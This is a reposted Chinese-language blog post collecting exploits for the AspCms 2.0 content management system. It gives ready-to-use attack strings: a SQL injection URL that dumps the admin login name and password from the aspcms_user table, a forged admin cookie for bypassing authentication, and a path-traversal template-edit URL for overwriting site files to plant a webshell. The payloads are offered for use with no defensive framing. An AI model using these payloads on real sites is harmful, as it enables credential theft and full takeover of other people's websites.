admin/_content/_About/AspCms_AboutEdit.asp?id=19?and?1=2?union?select?1,2,3,4,5,loginname,7,8,9,password,11,12,13,14,15,16,17,18,19,20,21,22,23,24?from?aspcms_user?where?userid=1

————————————————————————
Powered by AspCms2.0
未驗(yàn)證權(quán)限，且存在注入漏洞
admin/_content/_About/AspCms_AboutEdit.asp?id=19
表名：aspcms_user
列名：loginname、password

利用EXP：

admin/_content/_About/AspCms_AboutEdit.asp?id=19?and?1=2?union?select?1,2,3,4,5,loginname,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,password,25,26,27,28,29,30,31,32,33,34,35?from?aspcms_user?where?userid=1

2.0漏洞測試人：逍遙復(fù)仇（請注明）

——————Cookies欺騙——————

cookies:username=admin;?ASPSESSIONIDAABTAACS=IHDJOJACOPKFEEENHHMJHKLG;?LanguageAlias=cn;?LanguagePath=%2F;?languageID=1;?adminId=1;?adminName=admin;?groupMenu=1%2C+70%2C+10%2C+11%2C+12%2C+13%2C+14%2C+20%2C+68%2C+15%2C+16%2C+17%2C+18%2C+3%2C+25%2C+57%2C+58%2C+59%2C+2%2C+21%2C+22%2C+23%2C+24%2C+4%2C+27%2C+28%2C+29%2C+5%2C+49%2C+52%2C+56%2C+30%2C+51%2C+53%2C+54%2C+55%2C+188%2C+67%2C+63%2C+190%2C+184%2C+86%2C+6%2C+32%2C+33%2C+34%2C+8%2C+37%2C+183%2C+38%2C+60%2C+9;?GroupName=%B3%AC%BC%B6%B9%DC%C0%ED%D4%B1%D7%E9

逍遙復(fù)仇碰到一個(gè)站后臺(tái)被管理員改了，NND。后臺(tái)主頁半天沒有找到，最后去官方down源碼查看是home.asp（版本不同如不對請?jiān)噈ain.asp），工具為：Cookie & Inject Browser
——————webshell獲取——————
所有版本存在后臺(tái)編輯風(fēng)格 可以修改任意文件，獲取webshell就很簡單了

admin/_Style/AspCms_TemplateEdit.asp?acttype=&filename=../../../index.asp

轉(zhuǎn)載于:https://blog.51cto.com/0daysec/1571383

總結(jié)

以上是生活随笔為你收集整理的aspcms各版本漏洞0day集合的全部內(nèi)容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯(cuò)，歡迎將生活随笔推薦給好友。